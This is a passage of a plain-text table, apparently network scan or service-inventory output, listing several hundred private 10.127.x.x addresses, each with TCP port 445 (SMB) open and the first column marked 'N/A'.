| N/A | 10.127.3.216:445 | tcp | |
| N/A | 10.127.3.231:445 | tcp | |
| N/A | 10.127.3.249:445 | tcp | |
| N/A | 10.127.3.253:445 | tcp | |
| N/A | 10.127.3.239:445 | tcp | |
| N/A | 10.127.3.238:445 | tcp | |
| N/A | 10.127.3.250:445 | tcp | |
| N/A | 10.127.3.252:445 | tcp | |
| N/A | 10.127.3.206:445 | tcp | |
| N/A | 10.127.3.193:445 | tcp | |
| N/A | 10.127.3.203:445 | tcp | |
| N/A | 10.127.3.226:445 | tcp | |
| N/A | 10.127.3.224:445 | tcp | |
| N/A | 10.127.3.240:445 | tcp | |
| N/A | 10.127.3.254:445 | tcp | |
| N/A | 10.127.3.225:445 | tcp | |
| N/A | 10.127.3.251:445 | tcp | |
| N/A | 10.127.3.208:445 | tcp | |
| N/A | 10.127.3.223:445 | tcp | |
| N/A | 10.127.3.228:445 | tcp | |
| N/A | 10.127.3.194:445 | tcp | |
| N/A | 10.127.3.233:445 | tcp | |
| N/A | 10.127.3.209:445 | tcp | |
| N/A | 10.127.3.214:445 | tcp | |
| N/A | 10.127.3.196:445 | tcp | |
| N/A | 10.127.3.204:445 | tcp | |
| N/A | 10.127.3.248:445 | tcp | |
| N/A | 10.127.3.247:445 | tcp | |
| N/A | 10.127.3.213:445 | tcp | |
| N/A | 10.127.3.237:445 | tcp | |
| N/A | 10.127.3.241:445 | tcp | |
| N/A | 10.127.3.236:445 | tcp | |
| N/A | 10.127.3.255:445 | tcp | |
| N/A | 10.127.3.197:445 | tcp | |
| N/A | 10.127.3.232:445 | tcp | |
| N/A | 10.127.3.211:445 | tcp | |
| N/A | 10.127.3.235:445 | tcp | |
| N/A | 10.127.3.207:445 | tcp | |
| N/A | 10.127.3.234:445 | tcp | |
| N/A | 10.127.3.242:445 | tcp | |
| N/A | 10.127.3.220:445 | tcp | |
| N/A | 10.127.3.245:445 | tcp | |
| N/A | 10.127.3.246:445 | tcp | |
| N/A | 10.127.4.1:445 | tcp | |
| N/A | 10.127.4.18:445 | tcp | |
| N/A | 10.127.4.22:445 | tcp | |
| N/A | 10.127.4.44:445 | tcp | |
| N/A | 10.127.4.64:445 | tcp | |
| N/A | 10.127.4.51:445 | tcp | |
| N/A | 10.127.4.48:445 | tcp | |
| N/A | 10.127.4.56:445 | tcp | |
| N/A | 10.127.4.21:445 | tcp | |
| N/A | 10.127.4.4:445 | tcp | |
| N/A | 10.127.4.43:445 | tcp | |
| N/A | 10.127.4.62:445 | tcp | |
| N/A | 10.127.4.63:445 | tcp | |
| N/A | 10.127.4.7:445 | tcp | |
| N/A | 10.127.4.2:445 | tcp | |
| N/A | 10.127.4.27:445 | tcp | |
| N/A | 10.127.4.8:445 | tcp | |
| N/A | 10.127.4.57:445 | tcp | |
| N/A | 10.127.4.13:445 | tcp | |
| N/A | 10.127.4.19:445 | tcp | |
| N/A | 10.127.4.61:445 | tcp | |
| N/A | 10.127.4.20:445 | tcp | |
| N/A | 10.127.4.11:445 | tcp | |
| N/A | 10.127.4.15:445 | tcp | |
| N/A | 10.127.4.45:445 | tcp | |
| N/A | 10.127.4.60:445 | tcp | |
| N/A | 10.127.4.52:445 | tcp | |
| N/A | 10.127.4.59:445 | tcp | |
| N/A | 10.127.4.24:445 | tcp | |
| N/A | 10.127.4.5:445 | tcp | |
| N/A | 10.127.4.58:445 | tcp | |
| N/A | 10.127.4.55:445 | tcp | |
| N/A | 10.127.4.9:445 | tcp | |
| N/A | 10.127.4.35:445 | tcp | |
| N/A | 10.127.4.49:445 | tcp | |
| N/A | 10.127.4.33:445 | tcp | |
| N/A | 10.127.4.54:445 | tcp | |
| N/A | 10.127.4.10:445 | tcp | |
| N/A | 10.127.4.34:445 | tcp | |
| N/A | 10.127.4.50:445 | tcp | |
| N/A | 10.127.4.26:445 | tcp | |
| N/A | 10.127.4.31:445 | tcp | |
| N/A | 10.127.4.46:445 | tcp | |
| N/A | 10.127.4.6:445 | tcp | |
| N/A | 10.127.4.29:445 | tcp | |
| N/A | 10.127.4.37:445 | tcp | |
| N/A | 10.127.4.14:445 | tcp | |
| N/A | 10.127.4.36:445 | tcp | |
| N/A | 10.127.4.40:445 | tcp | |
| N/A | 10.127.4.41:445 | tcp | |
| N/A | 10.127.4.17:445 | tcp | |
| N/A | 10.127.4.30:445 | tcp | |
| N/A | 10.127.4.39:445 | tcp | |
| N/A | 10.127.4.47:445 | tcp | |
| N/A | 10.127.4.12:445 | tcp | |
| N/A | 10.127.4.38:445 | tcp | |
| N/A | 10.127.4.53:445 | tcp | |
| N/A | 10.127.4.32:445 | tcp | |
| N/A | 10.127.4.42:445 | tcp | |
| N/A | 10.127.4.25:445 | tcp | |
| N/A | 10.127.4.28:445 | tcp | |
| N/A | 10.127.4.3:445 | tcp | |
| N/A | 10.127.4.16:445 | tcp | |
| N/A | 10.127.4.23:445 | tcp | |
| N/A | 10.127.4.65:445 | tcp | |
| N/A | 10.127.4.81:445 | tcp | |
| N/A | 10.127.4.102:445 | tcp | |
| N/A | 10.127.4.127:445 | tcp | |
| N/A | 10.127.4.84:445 | tcp | |
| N/A | 10.127.4.74:445 | tcp | |
| N/A | 10.127.4.78:445 | tcp | |
| N/A | 10.127.4.92:445 | tcp | |
| N/A | 10.127.4.69:445 | tcp | |
| N/A | 10.127.4.114:445 | tcp | |
| N/A | 10.127.4.100:445 | tcp | |
| N/A | 10.127.4.76:445 | tcp | |
| N/A | 10.127.4.73:445 | tcp | |
| N/A | 10.127.4.75:445 | tcp | |
| N/A | 10.127.4.90:445 | tcp | |
| N/A | 10.127.4.126:445 | tcp | |
| N/A | 10.127.4.101:445 | tcp | |
| N/A | 10.127.4.124:445 | tcp | |
| N/A | 10.127.4.86:445 | tcp | |
| N/A | 10.127.4.108:445 | tcp | |
| N/A | 10.127.4.111:445 | tcp | |
| N/A | 10.127.4.121:445 | tcp | |
| N/A | 10.127.4.67:445 | tcp | |
| N/A | 10.127.4.119:445 | tcp | |
| N/A | 10.127.4.109:445 | tcp | |
| N/A | 10.127.4.70:445 | tcp | |
| N/A | 10.127.4.79:445 | tcp | |
| N/A | 10.127.4.88:445 | tcp | |
| N/A | 10.127.4.107:445 | tcp | |
| N/A | 10.127.4.128:445 | tcp | |
| N/A | 10.127.4.68:445 | tcp | |
| N/A | 10.127.4.82:445 | tcp | |
| N/A | 10.127.4.115:445 | tcp | |
| N/A | 10.127.4.120:445 | tcp | |
| N/A | 10.127.4.117:445 | tcp | |
| N/A | 10.127.4.99:445 | tcp | |
| N/A | 10.127.4.91:445 | tcp | |
| N/A | 10.127.4.96:445 | tcp | |
| N/A | 10.127.4.113:445 | tcp | |
| N/A | 10.127.4.123:445 | tcp | |
| N/A | 10.127.4.77:445 | tcp | |
| N/A | 10.127.4.94:445 | tcp | |
| N/A | 10.127.4.93:445 | tcp | |
| N/A | 10.127.4.106:445 | tcp | |
| N/A | 10.127.4.110:445 | tcp | |
| N/A | 10.127.4.66:445 | tcp | |
| N/A | 10.127.4.87:445 | tcp | |
| N/A | 10.127.4.104:445 | tcp | |
| N/A | 10.127.4.71:445 | tcp | |
| N/A | 10.127.4.103:445 | tcp | |
| N/A | 10.127.4.122:445 | tcp | |
| N/A | 10.127.4.116:445 | tcp | |
| N/A | 10.127.4.105:445 | tcp | |
| N/A | 10.127.4.98:445 | tcp | |
| N/A | 10.127.4.112:445 | tcp | |
| N/A | 10.127.4.85:445 | tcp | |
| N/A | 10.127.4.89:445 | tcp | |
| N/A | 10.127.4.95:445 | tcp | |
| N/A | 10.127.4.72:445 | tcp | |
| N/A | 10.127.4.83:445 | tcp | |
| N/A | 10.127.4.125:445 | tcp | |
| N/A | 10.127.4.80:445 | tcp | |
| N/A | 10.127.4.118:445 | tcp | |
| N/A | 10.127.4.97:445 | tcp | |
| N/A | 10.127.4.169:445 | tcp | |
| N/A | 10.127.4.141:445 | tcp | |
| N/A | 10.127.4.174:445 | tcp | |
| N/A | 10.127.4.178:445 | tcp | |
| N/A | 10.127.4.163:445 | tcp | |
| N/A | 10.127.4.182:445 | tcp | |
| N/A | 10.127.4.188:445 | tcp | |
| N/A | 10.127.4.185:445 | tcp | |
| N/A | 10.127.4.129:445 | tcp | |
| N/A | 10.127.4.145:445 | tcp | |
| N/A | 10.127.4.146:445 | tcp | |
| N/A | 10.127.4.159:445 | tcp | |
| N/A | 10.127.4.164:445 | tcp | |
| N/A | 10.127.4.161:445 | tcp | |
| N/A | 10.127.4.136:445 | tcp | |
| N/A | 10.127.4.168:445 | tcp | |
| N/A | 10.127.4.130:445 | tcp | |
| N/A | 10.127.4.189:445 | tcp | |
| N/A | 10.127.4.134:445 | tcp | |
| N/A | 10.127.4.167:445 | tcp | |
| N/A | 10.127.4.147:445 | tcp | |
| N/A | 10.127.4.157:445 | tcp | |
| N/A | 10.127.4.150:445 | tcp | |
| N/A | 10.127.4.160:445 | tcp | |
| N/A | 10.127.4.133:445 | tcp | |
| N/A | 10.127.4.191:445 | tcp | |
| N/A | 10.127.4.165:445 | tcp | |
| N/A | 10.127.4.135:445 | tcp | |
| N/A | 10.127.4.176:445 | tcp | |
| N/A | 10.127.4.187:445 | tcp | |
| N/A | 10.127.4.152:445 | tcp | |
| N/A | 10.127.4.179:445 | tcp | |
| N/A | 10.127.4.142:445 | tcp | |
| N/A | 10.127.4.171:445 | tcp | |
| N/A | 10.127.4.183:445 | tcp | |
| N/A | 10.127.4.175:445 | tcp | |
| N/A | 10.127.4.149:445 | tcp | |
| N/A | 10.127.4.190:445 | tcp | |
| N/A | 10.127.4.138:445 | tcp | |
| N/A | 10.127.4.148:445 | tcp | |
| N/A | 10.127.4.154:445 | tcp | |
| N/A | 10.127.4.155:445 | tcp | |
| N/A | 10.127.4.144:445 | tcp | |
| N/A | 10.127.4.192:445 | tcp | |
| N/A | 10.127.4.158:445 | tcp | |
| N/A | 10.127.4.184:445 | tcp | |
| N/A | 10.127.4.153:445 | tcp | |
| N/A | 10.127.4.156:445 | tcp | |
| N/A | 10.127.4.181:445 | tcp | |
| N/A | 10.127.4.186:445 | tcp | |
| N/A | 10.127.4.172:445 | tcp | |
| N/A | 10.127.4.151:445 | tcp | |
| N/A | 10.127.4.170:445 | tcp | |
| N/A | 10.127.4.177:445 | tcp | |
| N/A | 10.127.4.137:445 | tcp | |
| N/A | 10.127.4.131:445 | tcp | |
| N/A | 10.127.4.140:445 | tcp | |
| N/A | 10.127.4.173:445 | tcp | |
| N/A | 10.127.4.132:445 | tcp | |
| N/A | 10.127.4.139:445 | tcp | |
| N/A | 10.127.4.143:445 | tcp | |
| N/A | 10.127.4.180:445 | tcp | |
| N/A | 10.127.4.162:445 | tcp | |
| N/A | 10.127.4.166:445 | tcp | |
| N/A | 10.127.4.193:445 | tcp | |
| N/A | 10.127.4.206:445 | tcp | |
| N/A | 10.127.4.232:445 | tcp | |
| N/A | 10.127.4.233:445 | tcp | |
| N/A | 10.127.4.203:445 | tcp | |
| N/A | 10.127.4.208:445 | tcp | |
| N/A | 10.127.4.197:445 | tcp | |
| N/A | 10.127.4.211:445 | tcp | |
| N/A | 10.127.4.209:445 | tcp | |
| N/A | 10.127.4.227:445 | tcp | |
| N/A | 10.127.4.207:445 | tcp | |
| N/A | 10.127.4.214:445 | tcp | |
| N/A | 10.127.4.246:445 | tcp | |
| N/A | 10.127.4.194:445 | tcp | |
| N/A | 10.127.4.234:445 | tcp | |
| N/A | 10.127.4.217:445 | tcp | |
| N/A | 10.127.4.237:445 | tcp | |
| N/A | 10.127.4.251:445 | tcp | |
| N/A | 10.127.4.252:445 | tcp | |
| N/A | 10.127.4.225:445 | tcp | |
| N/A | 10.127.4.236:445 | tcp | |
| N/A | 10.127.4.248:445 | tcp | |
| N/A | 10.127.4.239:445 | tcp | |
| N/A | 10.127.4.230:445 | tcp | |
| N/A | 10.127.4.195:445 | tcp | |
| N/A | 10.127.4.204:445 | tcp | |
| N/A | 10.127.4.241:445 | tcp | |
| N/A | 10.127.4.249:445 | tcp | |
| N/A | 10.127.4.222:445 | tcp | |
| N/A | 10.127.4.226:445 | tcp | |
| N/A | 10.127.4.238:445 | tcp | |
| N/A | 10.127.4.244:445 | tcp | |
| N/A | 10.127.4.196:445 | tcp | |
| N/A | 10.127.4.220:445 | tcp | |
| N/A | 10.127.4.253:445 | tcp | |
| N/A | 10.127.4.235:445 | tcp | |
| N/A | 10.127.4.250:445 | tcp | |
| N/A | 10.127.4.213:445 | tcp | |
| N/A | 10.127.4.223:445 | tcp | |
| N/A | 10.127.4.254:445 | tcp | |
| N/A | 10.127.4.221:445 | tcp | |
| N/A | 10.127.4.243:445 | tcp | |
| N/A | 10.127.4.228:445 | tcp | |
| N/A | 10.127.4.255:445 | tcp | |
| N/A | 10.127.4.218:445 | tcp | |
| N/A | 10.127.4.215:445 | tcp | |
| N/A | 10.127.4.198:445 | tcp | |
| N/A | 10.127.4.242:445 | tcp | |
| N/A | 10.127.4.205:445 | tcp | |
| N/A | 10.127.4.245:445 | tcp | |
| N/A | 10.127.4.212:445 | tcp | |
| N/A | 10.127.4.199:445 | tcp | |
| N/A | 10.127.4.219:445 | tcp | |
| N/A | 10.127.4.200:445 | tcp | |
| N/A | 10.127.4.216:445 | tcp | |
| N/A | 10.127.4.231:445 | tcp | |
| N/A | 10.127.4.201:445 | tcp | |
| N/A | 10.127.5.0:445 | tcp | |
| N/A | 10.127.4.229:445 | tcp | |
| N/A | 10.127.4.240:445 | tcp | |
| N/A | 10.127.4.224:445 | tcp | |
| N/A | 10.127.4.247:445 | tcp | |
| N/A | 10.127.4.202:445 | tcp | |
| N/A | 10.127.4.210:445 | tcp | |
| N/A | 10.127.5.1:445 | tcp | |
| N/A | 10.127.5.6:445 | tcp | |
| N/A | 10.127.5.21:445 | tcp | |
| N/A | 10.127.5.25:445 | tcp | |
| N/A | 10.127.5.3:445 | tcp | |
| N/A | 10.127.5.11:445 | tcp | |
| N/A | 10.127.5.37:445 | tcp | |
| N/A | 10.127.5.7:445 | tcp | |
| N/A | 10.127.5.26:445 | tcp | |
| N/A | 10.127.5.36:445 | tcp | |
| N/A | 10.127.5.47:445 | tcp | |
| N/A | 10.127.5.45:445 | tcp | |
| N/A | 10.127.5.46:445 | tcp | |
| N/A | 10.127.5.28:445 | tcp | |
| N/A | 10.127.5.20:445 | tcp | |
| N/A | 10.127.5.31:445 | tcp | |
| N/A | 10.127.5.48:445 | tcp | |
| N/A | 10.127.5.50:445 | tcp | |
| N/A | 10.127.5.10:445 | tcp | |
| N/A | 10.127.5.29:445 | tcp | |
| N/A | 10.127.5.38:445 | tcp | |
| N/A | 10.127.5.30:445 | tcp | |
| N/A | 10.127.5.18:445 | tcp | |
| N/A | 10.127.5.24:445 | tcp | |
| N/A | 10.127.5.4:445 | tcp | |
| N/A | 10.127.5.19:445 | tcp | |
| N/A | 10.127.5.59:445 | tcp | |
| N/A | 10.127.5.13:445 | tcp | |
| N/A | 10.127.5.15:445 | tcp | |
| N/A | 10.127.5.62:445 | tcp | |
| N/A | 10.127.5.34:445 | tcp | |
| N/A | 10.127.5.64:445 | tcp | |
| N/A | 10.127.5.44:445 | tcp | |
| N/A | 10.127.5.57:445 | tcp | |
| N/A | 10.127.5.60:445 | tcp | |
| N/A | 10.127.5.56:445 | tcp | |
| N/A | 10.127.5.12:445 | tcp | |
| N/A | 10.127.5.17:445 | tcp | |
| N/A | 10.127.5.5:445 | tcp | |
| N/A | 10.127.5.27:445 | tcp | |
| N/A | 10.127.5.53:445 | tcp | |
| N/A | 10.127.5.33:445 | tcp | |
| N/A | 10.127.5.43:445 | tcp | |
| N/A | 10.127.5.51:445 | tcp | |
| N/A | 10.127.5.52:445 | tcp | |
| N/A | 10.127.5.22:445 | tcp | |
| N/A | 10.127.5.61:445 | tcp | |
| N/A | 10.127.5.23:445 | tcp | |
| N/A | 10.127.5.55:445 | tcp | |
| N/A | 10.127.5.9:445 | tcp | |
| N/A | 10.127.5.16:445 | tcp | |
| N/A | 10.127.5.8:445 | tcp | |
| N/A | 10.127.5.42:445 | tcp | |
| N/A | 10.127.5.49:445 | tcp | |
| N/A | 10.127.5.14:445 | tcp | |
| N/A | 10.127.5.40:445 | tcp | |
| N/A | 10.127.5.32:445 | tcp | |
| N/A | 10.127.5.54:445 | tcp | |
| N/A | 10.127.5.39:445 | tcp | |
| N/A | 10.127.5.63:445 | tcp | |
| N/A | 10.127.5.41:445 | tcp | |
| N/A | 10.127.5.2:445 | tcp | |
| N/A | 10.127.5.35:445 | tcp | |
| N/A | 10.127.5.58:445 | tcp | |
| N/A | 10.127.5.65:445 | tcp | |
| N/A | 10.127.5.94:445 | tcp | |
| N/A | 10.127.5.110:445 | tcp | |
| N/A | 10.127.5.106:445 | tcp | |
| N/A | 10.127.5.119:445 | tcp | |
| N/A | 10.127.5.76:445 | tcp | |
| N/A | 10.127.5.122:445 | tcp | |
| N/A | 10.127.5.102:445 | tcp | |
| N/A | 10.127.5.78:445 | tcp | |
| N/A | 10.127.5.72:445 | tcp | |
| N/A | 10.127.5.101:445 | tcp | |
| N/A | 10.127.5.117:445 | tcp | |
| N/A | 10.127.5.67:445 | tcp | |
| N/A | 10.127.5.128:445 | tcp | |
| N/A | 10.127.5.80:445 | tcp | |
| N/A | 10.127.5.104:445 | tcp | |
| N/A | 10.127.5.71:445 | tcp | |
| N/A | 10.127.5.73:445 | tcp | |
| N/A | 10.127.5.99:445 | tcp | |
| N/A | 10.127.5.81:445 | tcp | |
| N/A | 10.127.5.118:445 | tcp | |
| N/A | 10.127.5.113:445 | tcp | |
| N/A | 10.127.5.74:445 | tcp | |
| N/A | 10.127.5.91:445 | tcp | |
| N/A | 10.127.5.103:445 | tcp | |
| N/A | 10.127.5.66:445 | tcp | |
| N/A | 10.127.5.85:445 | tcp | |
| N/A | 10.127.5.123:445 | tcp | |
| N/A | 10.127.5.95:445 | tcp | |
| N/A | 10.127.5.111:445 | tcp | |
| N/A | 10.127.5.120:445 | tcp | |
| N/A | 10.127.5.89:445 | tcp | |
| N/A | 10.127.5.105:445 | tcp | |
| N/A | 10.127.5.107:445 | tcp | |
| N/A | 10.127.5.126:445 | tcp | |
| N/A | 10.127.5.93:445 | tcp | |
| N/A | 10.127.5.68:445 | tcp | |
| N/A | 10.127.5.69:445 | tcp | |
| N/A | 10.127.5.116:445 | tcp | |
| N/A | 10.127.5.97:445 | tcp | |
| N/A | 10.127.5.92:445 | tcp | |
| N/A | 10.127.5.96:445 | tcp | |
| N/A | 10.127.5.88:445 | tcp | |
| N/A | 10.127.5.114:445 | tcp | |
| N/A | 10.127.5.109:445 | tcp | |
| N/A | 10.127.5.82:445 | tcp | |
| N/A | 10.127.5.98:445 | tcp | |
| N/A | 10.127.5.70:445 | tcp | |
| N/A | 10.127.5.87:445 | tcp | |
| N/A | 10.127.5.127:445 | tcp | |
| N/A | 10.127.5.79:445 | tcp | |
| N/A | 10.127.5.84:445 | tcp | |
| N/A | 10.127.5.86:445 | tcp | |
| N/A | 10.127.5.124:445 | tcp | |
| N/A | 10.127.5.77:445 | tcp | |
| N/A | 10.127.5.100:445 | tcp | |
| N/A | 10.127.5.112:445 | tcp | |
| N/A | 10.127.5.115:445 | tcp | |
| N/A | 10.127.5.75:445 | tcp | |
| N/A | 10.127.5.108:445 | tcp | |
| N/A | 10.127.5.121:445 | tcp | |
| N/A | 10.127.5.83:445 | tcp | |
| N/A | 10.127.5.90:445 | tcp | |
| N/A | 10.127.5.125:445 | tcp | |
| N/A | 10.127.5.129:445 | tcp | |
| N/A | 10.127.5.153:445 | tcp | |
| N/A | 10.127.5.161:445 | tcp | |
| N/A | 10.127.5.173:445 | tcp | |
| N/A | 10.127.5.169:445 | tcp | |
| N/A | 10.127.5.135:445 | tcp | |
| N/A | 10.127.5.174:445 | tcp | |
| N/A | 10.127.5.191:445 | tcp | |
| N/A | 10.127.5.168:445 | tcp | |
| N/A | 10.127.5.136:445 | tcp | |
| N/A | 10.127.5.156:445 | tcp | |
| N/A | 10.127.5.164:445 | tcp | |
| N/A | 10.127.5.151:445 | tcp | |
| N/A | 10.127.5.152:445 | tcp | |
| N/A | 10.127.5.130:445 | tcp | |
| N/A | 10.127.5.155:445 | tcp | |
| N/A | 10.127.5.188:445 | tcp | |
| N/A | 10.127.5.154:445 | tcp | |
| N/A | 10.127.5.166:445 | tcp | |
| N/A | 10.127.5.176:445 | tcp | |
| N/A | 10.127.5.144:445 | tcp | |
| N/A | 10.127.5.147:445 | tcp | |
| N/A | 10.127.5.167:445 | tcp | |
| N/A | 10.127.5.141:445 | tcp | |
| N/A | 10.127.5.192:445 | tcp | |
| N/A | 10.127.5.185:445 | tcp | |
| N/A | 10.127.5.132:445 | tcp | |
| N/A | 10.127.5.145:445 | tcp | |
| N/A | 10.127.5.175:445 | tcp | |
| N/A | 10.127.5.178:445 | tcp | |
| N/A | 10.127.5.180:445 | tcp | |
| N/A | 10.127.5.170:445 | tcp | |
| N/A | 10.127.5.131:445 | tcp | |
| N/A | 10.127.5.134:445 | tcp | |
| N/A | 10.127.5.137:445 | tcp | |
| N/A | 10.127.5.149:445 | tcp | |
| N/A | 10.127.5.150:445 | tcp | |
| N/A | 10.127.5.160:445 | tcp | |
| N/A | 10.127.5.143:445 | tcp | |
| N/A | 10.127.5.190:445 | tcp | |
| N/A | 10.127.5.133:445 | tcp | |
| N/A | 10.127.5.158:445 | tcp | |
| N/A | 10.127.5.148:445 | tcp | |
| N/A | 10.127.5.165:445 | tcp | |
| N/A | 10.127.5.183:445 | tcp | |
| N/A | 10.127.5.189:445 | tcp | |
| N/A | 10.127.5.162:445 | tcp | |
| N/A | 10.127.5.172:445 | tcp | |
| N/A | 10.127.5.171:445 | tcp | |
| N/A | 10.127.5.146:445 | tcp | |
| N/A | 10.127.5.163:445 | tcp | |
| N/A | 10.127.5.182:445 | tcp | |
| N/A | 10.127.5.181:445 | tcp | |
| N/A | 10.127.5.177:445 | tcp | |
| N/A | 10.127.5.184:445 | tcp | |
| N/A | 10.127.5.139:445 | tcp | |
| N/A | 10.127.5.187:445 | tcp | |
| N/A | 10.127.5.142:445 | tcp | |
| N/A | 10.127.5.159:445 | tcp | |
| N/A | 10.127.5.179:445 | tcp | |
| N/A | 10.127.5.186:445 | tcp | |
| N/A | 10.127.5.140:445 | tcp | |
| N/A | 10.127.5.138:445 | tcp | |
| N/A | 10.127.5.157:445 | tcp | |
| N/A | 10.127.5.193:445 | tcp | |
| N/A | 10.127.5.220:445 | tcp | |
| N/A | 10.127.5.196:445 | tcp | |
| N/A | 10.127.5.251:445 | tcp | |
| N/A | 10.127.5.204:445 | tcp | |
| N/A | 10.127.5.216:445 | tcp | |
| N/A | 10.127.5.237:445 | tcp | |
| N/A | 10.127.5.222:445 | tcp | |
| N/A | 10.127.5.248:445 | tcp | |
| N/A | 10.127.5.242:445 | tcp | |
| N/A | 10.127.5.229:445 | tcp | |
| N/A | 10.127.5.245:445 | tcp | |
| N/A | 10.127.5.208:445 | tcp | |
| N/A | 10.127.5.213:445 | tcp | |
| N/A | 10.127.5.254:445 | tcp | |
| N/A | 10.127.5.249:445 | tcp | |
| N/A | 10.127.5.214:445 | tcp | |
| N/A | 10.127.5.236:445 | tcp | |
| N/A | 10.127.5.252:445 | tcp | |
| N/A | 10.127.5.212:445 | tcp | |
| N/A | 10.127.5.215:445 | tcp | |
| N/A | 10.127.5.244:445 | tcp | |
| N/A | 10.127.5.234:445 | tcp | |
| N/A | 10.127.5.247:445 | tcp | |
| N/A | 10.127.5.255:445 | tcp | |
| N/A | 10.127.5.207:445 | tcp | |
| N/A | 10.127.5.230:445 | tcp | |
| N/A | 10.127.5.240:445 | tcp | |
| N/A | 10.127.5.241:445 | tcp | |
| N/A | 10.127.5.221:445 | tcp | |
| N/A | 10.127.5.224:445 | tcp | |
| N/A | 10.127.5.227:445 | tcp | |
| N/A | 10.127.5.253:445 | tcp | |
| N/A | 10.127.5.246:445 | tcp | |
| N/A | 10.127.5.203:445 | tcp | |
| N/A | 10.127.5.211:445 | tcp | |
| N/A | 10.127.6.0:445 | tcp | |
| N/A | 10.127.5.199:445 | tcp | |
| N/A | 10.127.5.206:445 | tcp | |
| N/A | 10.127.5.231:445 | tcp | |
| N/A | 10.127.5.198:445 | tcp | |
| N/A | 10.127.5.225:445 | tcp | |
| N/A | 10.127.5.210:445 | tcp | |
| N/A | 10.127.5.197:445 | tcp | |
| N/A | 10.127.5.209:445 | tcp | |
| N/A | 10.127.5.219:445 | tcp | |
| N/A | 10.127.5.238:445 | tcp | |
| N/A | 10.127.5.200:445 | tcp | |
| N/A | 10.127.5.243:445 | tcp | |
| N/A | 10.127.5.201:445 | tcp | |
| N/A | 10.127.5.223:445 | tcp | |
| N/A | 10.127.5.233:445 | tcp | |
| N/A | 10.127.5.202:445 | tcp | |
| N/A | 10.127.5.217:445 | tcp | |
| N/A | 10.127.5.195:445 | tcp | |
| N/A | 10.127.5.218:445 | tcp | |
| N/A | 10.127.5.226:445 | tcp | |
| N/A | 10.127.5.194:445 | tcp | |
| N/A | 10.127.5.250:445 | tcp | |
| N/A | 10.127.5.235:445 | tcp | |
| N/A | 10.127.5.239:445 | tcp | |
| N/A | 10.127.5.205:445 | tcp | |
| N/A | 10.127.5.228:445 | tcp | |
| N/A | 10.127.5.232:445 | tcp | |
| N/A | 10.127.6.1:445 | tcp | |
| N/A | 10.127.6.7:445 | tcp | |
| N/A | 10.127.6.19:445 | tcp | |
| N/A | 10.127.6.5:445 | tcp | |
| N/A | 10.127.6.35:445 | tcp | |
| N/A | 10.127.6.50:445 | tcp | |
| N/A | 10.127.6.60:445 | tcp | |
| N/A | 10.127.6.41:445 | tcp | |
| N/A | 10.127.6.24:445 | tcp | |
| N/A | 10.127.6.3:445 | tcp | |
| N/A | 10.127.6.14:445 | tcp | |
| N/A | 10.127.6.46:445 | tcp | |
| N/A | 10.127.6.4:445 | tcp | |
| N/A | 10.127.6.6:445 | tcp | |
| N/A | 10.127.6.42:445 | tcp | |
| N/A | 10.127.6.57:445 | tcp | |
| N/A | 10.127.6.33:445 | tcp | |
| N/A | 10.127.6.45:445 | tcp | |
| N/A | 10.127.6.54:445 | tcp | |
| N/A | 10.127.6.15:445 | tcp | |
| N/A | 10.127.6.62:445 | tcp | |
| N/A | 10.127.6.26:445 | tcp | |
| N/A | 10.127.6.28:445 | tcp | |
| N/A | 10.127.6.13:445 | tcp | |
| N/A | 10.127.6.18:445 | tcp | |
| N/A | 10.127.6.38:445 | tcp | |
| N/A | 10.127.6.47:445 | tcp | |
| N/A | 10.127.6.52:445 | tcp | |
| N/A | 10.127.6.56:445 | tcp | |
| N/A | 10.127.6.44:445 | tcp | |
| N/A | 10.127.6.22:445 | tcp | |
| N/A | 10.127.6.34:445 | tcp | |
| N/A | 10.127.6.51:445 | tcp | |
| N/A | 10.127.6.39:445 | tcp | |
| N/A | 10.127.6.32:445 | tcp | |
| N/A | 10.127.6.64:445 | tcp | |
| N/A | 10.127.6.37:445 | tcp | |
| N/A | 10.127.6.23:445 | tcp | |
| N/A | 10.127.6.29:445 | tcp | |
| N/A | 10.127.6.53:445 | tcp | |
| N/A | 10.127.6.21:445 | tcp | |
| N/A | 10.127.6.27:445 | tcp | |
| N/A | 10.127.6.48:445 | tcp | |
| N/A | 10.127.6.61:445 | tcp | |
| N/A | 10.127.6.20:445 | tcp | |
| N/A | 10.127.6.43:445 | tcp | |
| N/A | 10.127.6.11:445 | tcp | |
| N/A | 10.127.6.10:445 | tcp | |
| N/A | 10.127.6.12:445 | tcp | |
| N/A | 10.127.6.40:445 | tcp | |
| N/A | 10.127.6.8:445 | tcp | |
| N/A | 10.127.6.9:445 | tcp | |
| N/A | 10.127.6.49:445 | tcp | |
| N/A | 10.127.6.25:445 | tcp | |
| N/A | 10.127.6.36:445 | tcp | |
| N/A | 10.127.6.58:445 | tcp | |
| N/A | 10.127.6.2:445 | tcp | |
| N/A | 10.127.6.31:445 | tcp | |
| N/A | 10.127.6.55:445 | tcp | |
| N/A | 10.127.6.16:445 | tcp | |
| N/A | 10.127.6.59:445 | tcp | |
| N/A | 10.127.6.17:445 | tcp | |
| N/A | 10.127.6.30:445 | tcp | |
| N/A | 10.127.6.63:445 | tcp | |
| N/A | 10.127.6.65:445 | tcp | |
| N/A | 10.127.6.75:445 | tcp | |
| N/A | 10.127.6.89:445 | tcp | |
| N/A | 10.127.6.102:445 | tcp | |
| N/A | 10.127.6.67:445 | tcp | |
| N/A | 10.127.6.115:445 | tcp | |
| N/A | 10.127.6.116:445 | tcp | |
| N/A | 10.127.6.78:445 | tcp | |
| N/A | 10.127.6.124:445 | tcp | |
| N/A | 10.127.6.70:445 | tcp | |
| N/A | 10.127.6.86:445 | tcp | |
| N/A | 10.127.6.121:445 | tcp | |
| N/A | 10.127.6.100:445 | tcp | |
| N/A | 10.127.6.103:445 | tcp | |
| N/A | 10.127.6.101:445 | tcp | |
| N/A | 10.127.6.99:445 | tcp | |
| N/A | 10.127.6.127:445 | tcp | |
| N/A | 10.127.6.71:445 | tcp | |
| N/A | 10.127.6.111:445 | tcp | |
| N/A | 10.127.6.98:445 | tcp | |
| N/A | 10.127.6.119:445 | tcp | |
| N/A | 10.127.6.69:445 | tcp | |
| N/A | 10.127.6.83:445 | tcp | |
| N/A | 10.127.6.94:445 | tcp | |
| N/A | 10.127.6.90:445 | tcp | |
| N/A | 10.127.6.73:445 | tcp | |
| N/A | 10.127.6.113:445 | tcp | |
| N/A | 10.127.6.72:445 | tcp | |
| N/A | 10.127.6.108:445 | tcp | |
| N/A | 10.127.6.79:445 | tcp | |
| N/A | 10.127.6.104:445 | tcp | |
| N/A | 10.127.6.123:445 | tcp | |
| N/A | 10.127.6.66:445 | tcp | |
